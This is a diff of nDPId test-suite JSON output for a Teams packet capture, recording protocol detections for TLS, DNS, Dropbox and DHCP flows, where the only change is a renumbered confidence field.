-00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00971{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041678029,"flow_last_seen":1587041678074,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041678074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":625,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041678029,"flow_last_seen":1587041678120,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041678120,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":644,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041678611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":644,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041678303,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1587041679059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041679059,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFmxQAAP8RnTvAqAEGwKgBAfouADUAMTs\/p0sBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="} -00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1587041679280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAIBKZoAAEARjaTAqAEG\/\/\/\/\/0RcRFwB7XmveyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxMzMzNTg3NDkxMjE4NDQ1MzM1NDE0MzUyMjUyODU2OTU0NjIxMiwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzI3NTAzNzA1NjAsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCA0MDU2NDYyNTkyLCA3MDUzNjI3MTg0LCAxNTIyMTc3NTg3LCAxNDIxMTE0Mzk5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01092{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1587041679280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAIBMegAAEARwq7AqAEGwKgB\/0RcRFwB7bcHeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAxMzMzNTg3NDkxMjE4NDQ1MzM1NDE0MzUyMjUyODU2OTU0NjIxMiwgImRpc3BsYXluYW1lIjogIiIsICJuYW1lc3BhY2VzIjogWzI3NTAzNzA1NjAsIDc4NTI2NjE3NywgMTUyNjI2MzA0NSwgMjg1MjE2MDcsIDE0ODE5MzM3LCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCA0MDU2NDYyNTkyLCA3MDUzNjI3MTg0LCAxNTIyMTc3NTg3LCAxNDIxMTE0Mzk5LCAxMjUyMTE2NDI5LCA5OTQ2OTc3MywgNzA3OTYzNjY4OCwgMTc2OTY0MzA3LCAxMjU1NDA1NjYsIDEwNDc0MjgxODksIDQ3MTYxOTAwNDgsIDU0NjcxNjMwODgsIDExOTUwNDQwNzEsIDk2ODUzMjI0LCAxNzYwOTk2MywgNjQ3ODMwMzQ0MCwgNTExNzA2NjQyLCA2Mjk3OTU1MTg0LCAxNDE1NjIwMzUwXX0="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00184{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":648,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041679406} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":648,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":649,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041679611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":649,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041679280,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1587041680062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041680062,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFhq8AAP8RsaDAqAEGwKgBAfouADUAMTs\/p0sBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1587041680074,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1587041680074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB61LQAAEARImfAqAEBwKgBBgA1+i4AZgAAp0uBgwABAAAAAQAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAHAGwAGAAEAAAA7ACkFZG5zZG\/AGwpwb3N0bWFzdGVywBt4ZvNkAACowAAAHCAAJOoAAAACWA=="} -00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041680074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041680074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00927{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1587041680216,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":397,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":397,"pkt_l4_len":363,"thread_ts_msec":1587041680216,"pkt":"\/\/\/\/\/\/\/\/AICPmq69CABFAAF\/44MAAEARlesAAAAA\/\/\/\/\/wBEAEMBa5dnAQEGABWCmMYYtQAAAAAAAAAAAAAAAAAAAAAAAACAj5quvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPRP\/j5quvQABAAEfyzfOuCfrPQjbUAB0AQE5AgXcPC1kaGNwY2QtNi4xMC4xOkxpbnV4LTQuOS41Ny12Nys6YXJtdjdsOkJDTTI4MzUMDHBpMy5udG9wLm9yZ5EBATcPAXkhAwYMDxocKjM2Ojt3\/w=="} -00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} +00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAABYCTNAAHEGSuNdPpadwKgBBgG77GBJd2ZkkI5L3oAY\/\/uUpgAAAQEICsJ1bW4wg\/kbFwMDAB8AAAAAAAAABVYf48xkHJTZ\/YMO7dmv4tC6Gofi60hR"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041680294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGhUbAqAEGXT6WnexgAbuQjkveAAAAAFAEAAAvzgAA"} 01944{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1156,"pkt_l4_len":1122,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAR2CTRAAHEGRsRdPpadwKgBBgG77GBJd2aIkI5L3oAY\/\/v9PwAAAQEICsJ1bW4wg\/kbFwMDBD0AAAAAAAAABm9iu+t9XgqZR4s0F3BUPHh3OFodjBrwIjhJ5jzUDrtlDVli1SVxk270m+gEbse5EGdXD2tQPqX+uNfx4B7otIIyfqifH2S\/KFxGyKDkumEYrUX2hsTy4AvsIXg77ggsd77nUCYIUkr9Dcu1K8XBBisxPpHT+zWCDZADIu9GEbXV2\/9sowiGe8yrlpVrokOfQ1DpsHmZowwlG7Bi36UFm+L5Z6cwifqjKB8bGHxJp5qTVRJD\/elikR43sBRzkZfcKqYDSp7JYzhK3QKUfc6m5GUQ5dfnLhv5nlfAs74UtmJ5EyjXuAHe9YxanSSvzzG4JMTWGAY5tTjjtYwpZihFAGx52HToq2O+CpcbwPHV1TLQUDbT2yGJc7gM1GLG5aFGzYu4CebCnnBl2NsUqq80dM5DZBgWZFtSy9z2NYnNFnXM\/L50k82dbGP\/hbFfCNFMS6BvXhwvqUQidPN2cRmVwTsWXaFgKlMTAFoatWZ\/LRmGoWBdnNparAnK8NJzgtzGWejWpNSxsXZQ1NSy\/4QwWmZ1aiyH3lAZfsyIjqYBH478mZLwQeLwCsFzK39ybhvc8awbkRiAIoeLHCDrqRPBNhP62oMKfuuybYfQO5cgeLBcoVWj4YmTHvVqXUaiIJM0ecCweYrE28c1bMOuRYrnD6X5H1vOaut8zUARe+SwmWED1FAd9+LaLocuQm5mzrdNkB6aXE4s0lhsnmXfrvdjFstoXCwJT0nh7ITIpoT2HCapxHTDXopSW+f6iqr0aTti5yh8nUUMgZZ++9jn1o3T3lmRclm9+mgQdUUmHkA3dQCgv